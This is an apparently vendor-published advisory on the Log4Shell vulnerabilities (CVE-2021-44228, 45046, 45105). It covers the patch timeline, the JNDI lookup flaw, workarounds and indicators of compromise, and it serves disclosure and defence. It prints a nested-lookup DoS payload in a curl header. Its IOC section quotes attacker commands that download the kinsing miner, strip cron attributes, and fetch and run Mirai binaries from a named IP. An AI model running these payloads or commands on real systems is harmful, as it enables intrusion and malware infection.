Log4Shell Multiple Critical Vulnerabilities: Updated Advisory

Log4J vulnerability is now being exploited by notorious ransomware groups such as Khonsari and Conti. Log4Shell had 3 high priority security patches in the last week alone, leading to increased threat severity.
Updated on
April 19, 2023
Published on
December 23, 2021
Subscribe to the latest industry news, threats and resources.

CategoryVulnerability Intelligence
Vulnerability ClassRemote Code Execution(Unauthenticated)Restricted Remote Code ExecutionDenial Of Service
CVSS:3.0 Score10(CVE-2021-44228)9(CVE-2021-45046)7.5(CVE-2021-4510)

Executive Summary

  • This is an updated advisory in context to the Log4Shell vulnerability advisory that CloudSEK sent out on 13 December 2021, covering significant criticalities emerging in this course of events.
  • The vulnerability is now being exploited by notorious ransomware groups such as Khonsari and Conti. 
  • Log4j2 has had 3 high priority security patches in the last week alone, leading to  increased threat severity. 
  • Threat actors have significantly broadened the scan for the vulnerabilities, and multiple high-profile financially motivated threat groups have already piggybacked on the flaw, to execute significant attacks.
  • Users are recommended to update to version 2.17.0 or later of Log4j2.

Threat actors selling malware suited for the vulnerabilities, on Telegram channels

What is Log4j ?

Log4j2 is a Java-based logging library written in Java, used in various open-source libraries and extensively used in major software applications such as Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, Minecraft: Java Edition, Tencent QQ, HCL, VMware, Adobe, Atlassian, etc.

Timeline of Events

On 9 December 2021, a bug was disclosed with a PoC on the internet, dubbed Log4Shell, an RCE flaw (tracked as CVE-2021-44228). This was deemed as one of the most destructive vulnerabilities to have been discovered. And to mitigate this issue, a patch was released on 13 December 2021 (updated v2.15.0). 

This version was earlier reported to be vulnerable to DoS (Denial of Service) attacks, followed by which researchers confirmed that there are bypasses to the fix that was implemented and that made this version susceptible to the RCE flaw CVE-2021-45046 as well. To mitigate this flaw another patch was released that was also vulnerable to DoS attacks (CVE-2021-45105). Then a high priority security patch was released in v2.17.0, to mitigate all the vulnerabilities.

Vulnerability Analysis


The vulnerability in Log4j was caused due to a misconfiguration in JNDI (Java Naming and Directory Interface). The utility had no restrictions set for accessing LDAP (Lightweight Directory Access Protocol). The attackers could leverage this flaw to their advantage by making a GET request to any endpoint, to which the server responds with a remote Java class file. This remote Java class file when injected into the server, results in Remote Code Execution.

The Java library that does the logging, interprets a string as a command, instead of just writing it to the log. For example, an attacker could use a login page, placing the attack string in the username field where they know it will be logged.

This vulnerability affected version 2.0-beta9 to 2.14.1 and was fixed in version 2.15.0


The vulnerability which was originally discovered on 13 December 2021 only had DoS as a potential attack vector and this vulnerability had a CVSS score of 3.7. Now, the score has been increased to 9, because in some of the non-default configurations it is still possible to achieve Remote Code Execution.

As an official workaround for CVE-2021-44228 it was advised to:

  • Set the system property, or

formatMsgNoLookups: true

  • Set the JVM parameter

JAVA_OPTS = -Dlog4j2.formatMsgNoLookups=true

These parameters were by default set to True in version 2.15.0. Bypasses were discovered to overcome these workarounds in certain circumstances.

“Only Pattern Layouts with a Context Lookup (for example, $${ctx:loginId}) are vulnerable to this. This         page previously incorrectly mentioned that Thread Context Map pattern (%X, %mdc, or %MDC) in the    layout would also allow this vulnerability.

While Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default, there are ways to bypass this and users should not rely on this.

This is an excerpt from the official Log4j security blog, which mentions the scenario in which v2.15.0 is also vulnerable to Remote Code Execution.

In this version, if the attacker input is being passed into the function

logger.info("String" + attackerData);

it will not result in a JNDI lookup. But the attacker will still have access if the vulnerable Log4j is using Thread Map Context :

ThreadContext.put("layout-pattern-value", attackerData);

The default properties in Log4j v2.15.0 only allowed local connections hence, the impact was minimal but if the attacker string was in the following the format,


this resulted in a recursive reference and allowed the attacker to reference his own server, which made the JNDI lookup to the malicious server possible, injecting Remote Java class file and achieving Remote Code Execution.

This vulnerability specifically affects v2.15.0 and any version from 2.0-beta9 to 2.14.1 using the official workaround mentioned above.


This vulnerability is vulnerable to a DoS attack vector which an attacker can achieve using the self referential lookup flaw. It allows an attacker with control over Thread Context Map data to cause a DoS attack, when a crafted string is interpreted.

Sample Payload: curl https://vulnerable.server:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'

This vulnerability affects versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3)

Remediation Measures

To address this vulnerability, potential targets could follow these steps:

  1. Update to the latest version i.e. 2.17.0
  2. If users are not able to update Log4j2 to the latest version:
  • Removing JndiLookup class from the classpath

zip -q -d log4j-core-*.jar

Please Note: It is advisable to update and patch to the latest version, as these workarounds might cause disruptions in your normal logging activity.

3.   In case, users are unable to update to the latest version, resort to the IMMA Model

  • Isolate
  • Minimize
  • Monitor 
  • Active Defense

Isolate the impacted systems to a vulnerable VLAN and deploy a Proxy Firewall with deep packet inspection to restrict the communication between the rest of the systems. Monitor for irregular patterns, look for unauthorized configuration changes and also look for port/ protocol mismatch in the infrastructure.

Please Note: If you're filtering on "ldap", "jndi", or the ${lower:x} keywords, there are bypasses available, a sample payload can be:


Indicators Of Compromise

The following indicators of compromise are associated with observed exploitation activity targeting CVE-2021-44228.










IP Addresses

A list of malicious IP addresses detected for Apache Log4j RCE Attempts can be found here



curl -o /tmp/kinsing

curl -o /tmp/libsystem.so

curl -o /etc/kinsing

chmod 777 /tmp/kinsing

chattr -R -i /var/spool/cron

chmod +x /etc/kinsing







Hashes (SHA256)





Mirai retrieval script (SHA256):

3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 (lh[.]sh)

Binary retrieval/ execution commands

wget hxxp[:]//62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;

wget hxxp[:]//62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;

wget hxxp[:]//62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;

Mirai binary hashes (SHA256)




Mirai attacker IP address


Additional Malware Payload Hashes (SHA256)




















Note: Refer to this collection of hashes


Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Dashboard mockup
Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.
Trusted by 400+ Top organisations